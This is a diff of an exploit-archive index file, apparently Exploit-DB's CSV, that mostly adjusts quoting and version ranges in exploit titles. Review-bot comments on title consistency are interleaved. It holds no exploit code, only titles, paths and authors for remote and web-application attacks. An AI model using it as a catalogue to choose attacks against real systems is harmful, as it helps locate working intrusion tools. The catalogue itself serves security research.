16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0
16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0
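Review bot: the 16320 line adds the version range but keeps the mis-placed quotes in `'Username' map script'` (three quote marks); the quoted term should be the whole option name, `'Username map script'`, matching how the next line quotes `'nttrans'` as a single unit.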
@ -11445,7 +11448,7 @@ id,file,description,date,author,platform,type,port
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
@ -12221,7 +12224,7 @@ id,file,description,date,author,platform,type,port
20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0
20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0
20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0
20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0
20340,platforms/unix/remote/20340.c,"Samba 2.0.7 - SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote,0
20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)",2012-08-08,Metasploit,php,remote,0
20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
@ -12524,7 +12527,7 @@ id,file,description,date,author,platform,type,port
21021,platforms/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,unix,remote,0
21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0
21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0
21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - pagecount File Overwrite",2001-07-22,kyprizel,multiple,remote,0
21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,multiple,remote,0
21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
@ -12926,7 +12929,7 @@ id,file,description,date,author,platform,type,port
22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0
22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0
22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0
22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - 'results.stm' Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0
22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0
22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0
@ -12973,7 +12976,7 @@ id,file,description,date,author,platform,type,port
22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0
22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,linux,remote,0
22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
22356,platforms/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0
22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0
22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0
@ -12999,7 +13002,7 @@ id,file,description,date,author,platform,type,port
22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0
22455,platforms/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0
22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Stack Overflow ROP-Based Exploit (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote,0
22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote,0
22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote,0
@ -13425,7 +13428,7 @@ id,file,description,date,author,platform,type,port
24065,platforms/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote,0
24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0
24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0
24076,platforms/windows/remote/24076.txt,"Sambar 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0
24076,platforms/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0
24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote,0
24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0
24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0
@ -13455,9 +13458,9 @@ id,file,description,date,author,platform,type,port
24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0
24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0
24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0
24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0
24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0
@ -13777,7 +13780,7 @@ id,file,description,date,author,platform,type,port
25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0
25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0
25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",multiple,remote,0
25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - results.stm indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25697,platforms/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Privilege Escalation",2005-05-24,"Oliver Karow",windows,remote,0
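Review bot: 25694 gets `'results.stm'` quoted, but the adjacent 25695 (`logout RCredirect`) from the same Sambar advisory follows the same "endpoint parameter" pattern and is left unquoted in the context lines; handle the sibling entries in the same pass so the quoting stays consistent within the group.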
@ -14714,15 +14717,15 @@ id,file,description,date,author,platform,type,port
33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0
40344,platforms/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection Exploit (Metasploit)",2016-09-07,"Egidio Romano",php,remote,80
33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33490,platforms/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,windows,remote,0
33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33504,platforms/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855
33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0
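Review bot: the quoting of `'Terminal Escape Sequence in Logs'` is applied to only four of the entries that carry the phrase (33489, 33498, 33502, 33503), while 33490, 33501 and 33504 are left unquoted in the context lines, and 33497 still reads `AOLServer Terminal 4.5.1 - Escape Sequence in Logs`, with `Terminal` misplaced before the version. Apply the quoting to all of them in one pass or to none, and fix 33497 to `AOLServer 4.5.1 - 'Terminal Escape Sequence in Logs' Command Injection`.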
@ -15518,7 +15521,7 @@ id,file,description,date,author,platform,type,port
39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22
39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80
39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
39599,platforms/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
@ -15577,7 +15580,7 @@ id,file,description,date,author,platform,type,port
40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
@ -15746,7 +15749,7 @@ id,file,description,date,author,platform,type,port
42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
42083,platforms/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,windows,remote,0
42084,platforms/linux/remote/42084.rb,"Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0
42084,platforms/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0
42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
42057,platforms/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote,0
42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
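Review bot: the affected range added to 42084 ("Samba 3.5.0 < 4.4.14/4.5.10/4.6.4") is not mirrored on 42060 three lines down, which still reads "Samba 3.5.0 - Remote Code Execution" and can be read as 3.5.0 only. If that entry targets the same 'is_known_pipename()' flaw, give it the same range so the two rows stay searchable together; if it does not, the 42084 title should say why the two differ.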
@ -21920,7 +21923,7 @@ id,file,description,date,author,platform,type,port
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
@ -22417,7 +22420,7 @@ id,file,description,date,author,platform,type,port
10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0
10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0
10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0
10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - Cross-Site Scripting / HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0
10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0
10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0
10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
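Review bot: the new 10293 title has an unbalanced quote: "PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection" opens a single quote after the dash that never closes and carries a stray space. The convention applied elsewhere in this commit quotes the component and closes it, e.g. "PHP-Nuke 8.0 - 'News Module' Cross-Site Scripting / HTML Code Injection".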
@ -26013,7 +26016,7 @@ id,file,description,date,author,platform,type,port
18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0
18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - 'author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0
18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0
18822,platforms/php/webapps/18822.txt,"PHP-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0
18822,platforms/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",php,webapps,0
18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0
18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0
18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0
@ -37329,8 +37332,8 @@ id,file,description,date,author,platform,type,port
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,php,webapps,0
40115,platforms/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,php,webapps,0
40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80
40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80
40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
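Review bot: the rewritten vBulletin titles for 40114 and 40115 move the location phrase in front of the vulnerability class but drop the quoting this commit uses for that purpose ('admin.php', 'Video Tag'), leaving "AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting" hard to parse. Suggest "vBulletin 4.x/5.x - 'AdminCP/ApiLog' xmlrpc API Authenticated Persistent Cross-Site Scripting" and "vBulletin 4.x - 'breadcrumbs' xmlrpc API Authenticated SQL Injection". The unchanged 40171 context line also has a trailing space inside its quotes ('devtools ') that could be cleaned in the same pass.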
@ -38062,6 +38065,7 @@ id,file,description,date,author,platform,type,port
42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38194,7 +38198,7 @@ id,file,description,date,author,platform,type,port
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'",2017-05-25,"Google Security Research",multiple,webapps,0
42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
@ -38390,13 +38394,17 @@ id,file,description,date,author,platform,type,port
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
